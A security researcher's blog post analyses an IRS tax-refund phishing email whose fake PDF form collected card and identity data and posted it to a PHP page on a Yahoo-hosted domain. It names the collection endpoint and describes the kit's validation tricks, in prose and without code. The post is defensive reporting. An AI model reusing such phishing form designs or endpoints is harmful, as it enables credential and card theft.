Trying to Clean up Yahoo!

Following immediately on the heels of this past week's abuse of free cloud services such as Yahoo Groups, Google Groups, etc etc We walk in to work this morning to find a fairly typical IRS tax refund phishing scheme coming through. It made it's way into inboxes in an email such as the one below stating that after their calculations that realized that you were owed a refund of $314.79, all you had to do was fill out the attached form.The form itself arrived as an .htm page slightly formated to pretend to look like a .pdf with the file name payment_form.pdf.htm. It had all of the usual fields to fill out such as your name, address, credit card number, CVV number, date of birth, mother's maiden, etc, you know, all of the stuff that the IRS never ever asks for. The code also had elements that would not accept data if someone tried to enter all 1's in the credit card field for example. It also included code to avoid the same entry in an ATM field, which wasn't even included in the form this go around. This shows that these codes are getting recycled and not completely being catered cleanly, or perhaps they were sold in phishing kits where the purchaser simply didn't know much about the code or how it worked and was just given simple directions on how to get it up and running. Still, these types of errors and redundancy are often seen throughout the criminal cyber world.
After all of the pertinent information was entered into the form and the "Submit" button was clicked, your information would then be posted onto a remote site by the name of xfilez.biz. More specifically, it was posted to a php page at the site called lus.php. I began to get a little curious when the xfilez page contained analytical javascript references that were located on Yahoo servers. the scripts themselves were located at yimg.com and webhosting.yahoo.com, both Yahoo sites. Could it be that in addition to not only hosting spam redirects on the groups pages, that Yahoo also hosted phishing scripts on their very own servers? So, I did a look up on the domain itself, and sure enough:
These were indeed hosted on Yahoo's very own servers. It wasn't looking too good for our buddies at Yahoo! spam galore, and now phishing attacks too, eek. I will say that as of around 3 pm cst, the site was taken down, which is a pretty good response time for them considering the spam redirects that reside on Yahoo groups are still very much active even after at least 7 days which was when Troy and I began following them. Perhaps they don't feel spam is worth hurried attention, or there is just way too many of them to be able to find them all. Regardless, it's a good thing the phishing scripts were taken down quickly, and it would be a great thing if Yahoo! as well the other major hosting providers actively continue to find, remove and make it harder for these criminal sites to appear.